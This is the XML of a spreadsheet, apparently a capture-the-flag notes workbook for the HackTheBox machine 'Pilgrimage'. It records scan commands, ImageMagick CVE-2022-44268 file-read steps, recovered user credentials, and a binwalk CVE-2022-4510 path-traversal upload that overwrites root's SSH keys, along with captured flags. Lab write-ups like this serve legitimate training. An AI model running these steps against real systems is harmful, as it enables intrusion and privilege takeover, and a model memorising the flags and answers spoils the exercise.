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B7AC5151-FC39-403C-90E9-8380C5C58932}"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 name="Misc" sheetId="5" r:id="rId5"/>
    <sheet name="Reverse Engineering" sheetId="6" r:id="rId6"/>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3" i="1" l="1"/>
  <c r="E2" i="1"/>
  <c r="F2" i="1"/>
  <c r="F3" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="77" uniqueCount="58">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Task</t>
  </si>
  <si>
    <t>App</t>
  </si>
  <si>
    <t>Sub task</t>
  </si>
  <si>
    <t>Resource</t>
  </si>
  <si>
    <t>22/tcp</t>
  </si>
  <si>
    <t>80/tcp</t>
  </si>
  <si>
    <t>22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)                                                                                                                                                                             
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)</t>
  </si>
  <si>
    <t>80/tcp open  http    nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0</t>
  </si>
  <si>
    <t>pilgrimage.htb</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>git-dumper http://pilgrimage.htb git</t>
  </si>
  <si>
    <t>pilgrimage.htb
CVE-2022-44268</t>
  </si>
  <si>
    <t xml:space="preserve">Domain name is pilgrimage.htb.
.git directory.
There's a vulnerable version of Magick that is being used to convert images to smaller verisons.
CVE-2022-44268
</t>
  </si>
  <si>
    <t>http://pilgrimage.htb/</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>https://github.com/entr0pie/CVE-2022-44268</t>
  </si>
  <si>
    <t>wget http://pilgrimage.htb/shrunk/6ab2750e2f5c8.png</t>
  </si>
  <si>
    <t xml:space="preserve">./magick identify -verbose ../6ab279752f014.png | grep -Pv "^( |Image)"  | xxd -r -p </t>
  </si>
  <si>
    <t>Okay so fun stuff based on the CVE. You need to upload a modified PNG file that contains a profile textual chunk.
When the profile keyword is encountered during parsing of the image file, it reads the keyword and pulls data from the file as the value. This can lead to local file inclusion.
Cool now I can grab the database.
Users table has creds.</t>
  </si>
  <si>
    <t>/var/db/pilgrimage
emily|abigchonkyboi123</t>
  </si>
  <si>
    <t xml:space="preserve">ssh -p 22 emily@pilgrimage.htb  </t>
  </si>
  <si>
    <t>emily</t>
  </si>
  <si>
    <t>Sorry, user emily may not run sudo on pilgrimage.</t>
  </si>
  <si>
    <t>ps auxww</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">user.txt 703b71b66e5cb865939dbcda21211878
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>/bin/bash /usr/sbin/malwarescan.sh
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/</t>
    </r>
  </si>
  <si>
    <t>python walkingpath.py ssh root.png ~/.ssh/mykey.pub</t>
  </si>
  <si>
    <t>scp binwalk_exploit.png emily@pilgrimage.htb:/var/www/pilgrimage.htb/shrunk/</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">On host as Emily.
Root is running malwarescan.sh. Also inotifywait is waiting for files to be created in the shrunk directory. It will trigger a process once they are created.
So basically for the malware.sh. It's waiting for files to be created in the directory. Once a file is created it checks to see if it is blacklisted. If it is it removes the file. If not it keeps it.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Binwalk version is 2.3.2.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>CVE-2022-4510</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Oh the directory traversal check will be bypassed. The ../ is not sanitized in this version and you can overwrite a file outside the range. In this case either authorized_keys or crontab.
</t>
    </r>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>root.txt ba000e836b75d7e1136d98b4886d748c</t>
  </si>
  <si>
    <t>https://www.onekey.com/resource/security-advisory-remote-command-execution-in-binwalk
https://github.com/adhikara13/CVE-2022-4510-WalkingPath</t>
  </si>
  <si>
    <r>
      <t>Overwrote the .ssh authorized keys file in the root directory.
Got the</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> root.txt</t>
    </r>
  </si>
  <si>
    <t>[victim_IP]</t>
  </si>
  <si>
    <t>sudo masscan -pT:1-65535,U:1-65535 --rate=1000 -e tun0 [victim_IP] &gt; raw_ports.txt</t>
  </si>
  <si>
    <t>sudo nmap -p$(cat raw_ports.txt | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -un | tr '\n' ',' | sed 's/,$//') -sS -sV --version-all -sC -O -T3 -v [victim_IP]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</si>
</sst>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2">
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.39994506668294322"/>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entr0pie/CVE-2022-4426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ekey.com/resource/security-advisory-remote-command-execution-in-binwal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30"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="75" zoomScaleNormal="75" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="E1" sqref="E1"/>
      <selection pane="bottomLeft" activeCell="I14" sqref="I14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="18.6640625" style="2" customWidth="1"/>
    <col min="2" max="2" width="15.77734375" style="2"/>
    <col min="3" max="3" width="23" style="2" customWidth="1"/>
    <col min="4" max="4" width="19.6640625" style="2" customWidth="1"/>
    <col min="5" max="5" width="17.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="14.77734375" style="2" customWidth="1"/>
    <col min="7" max="7" width="23.5546875" style="2" customWidth="1"/>
    <col min="8" max="8" width="35.44140625" style="2" customWidth="1"/>
    <col min="9" max="9" width="45.109375" style="2" customWidth="1"/>
    <col min="10" max="10" width="36.6640625" style="2" customWidth="1"/>
    <col min="11" max="11" width="48.33203125" style="2" customWidth="1"/>
    <col min="12" max="16384" width="15.777343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55</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>32</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>31</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>27</v>
      </c>
      <c r="E2" s="7" t="str">
        <f>LEFT($D2,FIND("/",$D2)-1)</f>
        <v>22</v>
      </c>
      <c r="F2" s="6" t="str">
        <f>MID($D2,FIND("/",$D2)+1,LEN($D2))</f>
        <v>tcp</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="3" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>55</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>32</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>31</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>28</v>
      </c>
      <c r="E3" s="7" t="str">
        <f>LEFT($D3,FIND("/",$D3)-1)</f>
        <v>80</v>
      </c>
      <c r="F3" s="6" t="str">
        <f t="shared" ref="F3" si="0">MID($D3,FIND("/",$D3)+1,LEN($D3))</f>
        <v>tcp</v>
      </c>
      <c r="G3" s="2" t="s">
        <v>30</v>
      </c>
      <c r="H3" s="2" t="s">
        <v>35</v>
      </c>
      <c r="I3" s="2" t="s">
        <v>34</v>
      </c>
      <c r="J3" s="5"/>
    </row>
    <row r="4" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E4" s="7"/>
      <c r="F4" s="6"/>
    </row>
    <row r="5" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E5" s="7"/>
      <c r="F5" s="6"/>
    </row>
    <row r="6" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E6" s="7"/>
      <c r="F6" s="6"/>
    </row>
    <row r="7" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E7" s="7"/>
      <c r="F7" s="6"/>
      <c r="I7" s="4"/>
      <c r="J7" s="5"/>
    </row>
    <row r="8" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E8" s="7"/>
      <c r="F8" s="6"/>
      <c r="J8" s="5"/>
    </row>
    <row r="9" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E9" s="7"/>
      <c r="F9" s="6"/>
      <c r="J9" s="5"/>
    </row>
    <row r="10" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E10" s="7"/>
      <c r="F10" s="6"/>
      <c r="I10" s="4"/>
    </row>
    <row r="11" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="1"/>
      <c r="E11" s="7"/>
      <c r="F11" s="6"/>
    </row>
    <row r="12" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E12" s="7"/>
      <c r="F12" s="6"/>
    </row>
    <row r="13" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E13" s="7"/>
      <c r="F13" s="6"/>
    </row>
    <row r="14" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" s="1"/>
      <c r="E14" s="7"/>
      <c r="F14" s="6"/>
    </row>
    <row r="15" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E15" s="7"/>
      <c r="F15" s="6"/>
      <c r="I15" s="4"/>
      <c r="J15" s="5"/>
    </row>
    <row r="16" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E16" s="7"/>
      <c r="F16" s="6"/>
    </row>
    <row r="17" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A17" s="1"/>
      <c r="E17" s="7"/>
      <c r="F17" s="6"/>
    </row>
    <row r="18" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E18" s="7"/>
      <c r="F18" s="6"/>
    </row>
    <row r="19" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A19" s="1"/>
      <c r="E19" s="7"/>
      <c r="F19" s="6"/>
    </row>
    <row r="20" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E20" s="7"/>
      <c r="F20" s="6"/>
    </row>
    <row r="21" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A21" s="1"/>
      <c r="E21" s="7"/>
      <c r="F21" s="6"/>
    </row>
    <row r="22" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E22" s="7"/>
      <c r="F22" s="6"/>
    </row>
    <row r="23" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" s="1"/>
      <c r="E23" s="7"/>
      <c r="F23" s="6"/>
    </row>
    <row r="24" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E24" s="7"/>
      <c r="F24" s="6"/>
    </row>
    <row r="25" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A25" s="1"/>
      <c r="E25" s="7"/>
      <c r="F25" s="6"/>
    </row>
    <row r="26" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E26" s="7"/>
      <c r="F26" s="6"/>
    </row>
    <row r="27" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E27" s="7"/>
      <c r="F27" s="6"/>
    </row>
    <row r="28" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A28" s="1"/>
      <c r="E28" s="7"/>
      <c r="F28" s="6"/>
    </row>
    <row r="29" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E29" s="7"/>
      <c r="F29" s="6"/>
    </row>
    <row r="30" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A30" s="1"/>
      <c r="E30" s="7"/>
      <c r="F30" s="6"/>
    </row>
  </sheetData>
  <autoFilter ref="A1:K1" xr:uid="{6037C755-4FE5-4C70-ABDC-86E8ABD7F626}">
    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K15">
      <sortCondition ref="E1"/>
    </sortState>
  </autoFilter>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K30">
    <sortCondition ref="F2:F30"/>
    <sortCondition ref="E2:E30"/>
  </sortState>
  <phoneticPr fontId="3" type="noConversion"/>
  <conditionalFormatting sqref="F2:F30">
    <cfRule type="cellIs" dxfId="1" priority="1" operator="equal">
      <formula>"udp"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="0" priority="2" operator="equal">
      <formula>"tcp"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I22"/>
  <sheetViews>
    <sheetView zoomScale="78" zoomScaleNormal="78" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="C20" sqref="C20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="31.44140625" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="6" width="31.44140625" style="2"/>
    <col min="7" max="7" width="38.33203125" style="2" customWidth="1"/>
    <col min="8" max="16384" width="31.44140625" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" s="4" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>17</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>16</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>21</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>10</v>
      </c>
      <c r="I1" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="1" t="s">
        <v>36</v>
      </c>
      <c r="B2" s="2">
        <v>80</v>
      </c>
      <c r="D2" s="2">
        <v>200</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>37</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>41</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>42</v>
      </c>
      <c r="H2" s="5" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="3" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1"/>
      <c r="H3" s="5"/>
    </row>
    <row r="4" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="H4" s="5"/>
    </row>
    <row r="8" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="G8" s="5"/>
    </row>
    <row r="9" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E9" s="4"/>
    </row>
    <row r="10" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E10" s="4"/>
    </row>
    <row r="11" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E11" s="4"/>
    </row>
    <row r="12" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E12" s="4"/>
    </row>
    <row r="13" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E13" s="4"/>
    </row>
    <row r="22" spans="8:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="H22" s="5"/>
    </row>
  </sheetData>
  <phoneticPr fontId="3" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="H2" r:id="rId1" xr:uid="{ABCA0CB6-A20F-42B2-8338-7145CBE002F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5"/>
  <sheetViews>
    <sheetView zoomScale="75" zoomScaleNormal="75" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B1" sqref="B1"/>
      <selection pane="bottomLeft" activeCell="J3" sqref="J3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="21.88671875" style="2" customWidth="1"/>
    <col min="2" max="4" width="15.77734375" style="2"/>
    <col min="5" max="5" width="30.109375" style="2" customWidth="1"/>
    <col min="6" max="6" width="21.5546875" style="2" customWidth="1"/>
    <col min="7" max="7" width="20.77734375" style="2" customWidth="1"/>
    <col min="8" max="8" width="47.88671875" style="2" customWidth="1"/>
    <col min="9" max="9" width="33.21875" style="2" customWidth="1"/>
    <col min="10" max="10" width="54.88671875" style="2" customWidth="1"/>
    <col min="11" max="11" width="38.44140625" style="2" customWidth="1"/>
    <col min="12" max="16384" width="15.777343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55</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>44</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>45</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>44</v>
      </c>
      <c r="H2" s="2" t="s">
        <v>50</v>
      </c>
      <c r="I2" s="5" t="s">
        <v>53</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="3" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H3" s="2" t="s">
        <v>54</v>
      </c>
      <c r="I3" s="5"/>
      <c r="J3" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="4" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="1"/>
      <c r="E4" s="1"/>
    </row>
    <row r="5" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="1"/>
      <c r="J5" s="4"/>
    </row>
  </sheetData>
  <phoneticPr fontId="3" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="I2" r:id="rId1" display="https://www.onekey.com/resource/security-advisory-remote-command-execution-in-binwalk" xr:uid="{955E10DC-4E0C-416E-BA67-87AD712FA459}"/>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B12"/>
  <sheetViews>
    <sheetView zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A27" sqref="A27"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="175" style="6" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="18.44140625" style="2" customWidth="1"/>
    <col min="3" max="16384" width="8.88671875" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" s="4" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="2" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="8" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="3" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="8" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="4" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="6" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="5" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="6" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="6" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="6" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="7" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="6" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="8" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="6" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="9" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="6" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="10" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" s="6" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="11" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="6" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="12" spans="1:2" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="6" t="s">
        <v>49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A2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A15" sqref="A15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="80.88671875" style="2" bestFit="1" customWidth="1"/>
    <col min="2" max="16384" width="8.88671875" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="2" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2"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2D08-FB8B-4BAB-A462-7059BEE8513F}">
  <dimension ref="A1:D3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D8" sqref="D8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="12.109375" style="1" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="13.5546875" style="1" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="15.5546875" style="1" customWidth="1"/>
    <col min="4" max="4" width="29.6640625" style="1" bestFit="1" customWidth="1"/>
    <col min="5" max="16384" width="8.88671875" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" s="3" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A1" s="3" t="s">
        <v>24</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>23</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>25</v>
      </c>
      <c r="D1" s="3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:4" x14ac:dyDescent="0.3">
      <c r="D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Network</vt:lpstr>
      <vt:lpstr>Web App</vt:lpstr>
      <vt:lpstr>On host</vt:lpstr>
      <vt:lpstr>Commands</vt:lpstr>
      <vt:lpstr>Misc</vt:lpstr>
      <vt:lpstr>Reverse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2026-09-25T14:24:53Z</dcterms:modified>
</cp:coreProperties>
</file>